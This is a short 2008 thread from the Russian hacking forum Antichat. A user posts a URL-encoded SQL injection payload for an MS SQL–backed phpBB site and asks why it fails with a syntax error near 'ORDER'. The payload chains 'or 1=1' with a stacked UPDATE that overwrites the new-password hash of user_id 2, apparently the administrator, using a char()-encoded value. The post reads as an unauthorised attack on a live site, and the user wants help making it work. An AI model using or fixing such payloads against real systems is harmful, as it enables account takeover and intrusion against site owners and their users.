ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Sql в Mssql
  #1  
Старый 01.02.2008, 05:41
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию Sql в Mssql

еСТЬ СКУЛЬ
Код:
299+or+1=+1;UPDATE+phpbb_users+SET+user_newpasswd=char(101)%2Bchar(49)%2Bchar(48)%2Bchar(97)%2Bchar(100)%2Bchar(99)%2Bchar(51)%2Bchar(57)%2Bchar(52)%2Bchar(57)%2Bchar(98)%2Bchar(97)%2Bchar(53)%2Bchar(57)%2Bchar(97)%2Bchar(98)%2Bchar(98)%2Bchar(101)%2Bchar(53)%2Bchar(54)%2Bchar(101)%2Bchar(48)%2Bchar(53)%2Bchar(55)%2Bchar(102)%2Bchar(50)%2Bchar(48)%2Bchar(102)%2Bchar(56)%2Bchar(56)%2Bchar(51)%2Bchar(101)+WHERE+user_id=2--
Выдает ошибку
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'ORDER'.

В чем проблема?
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ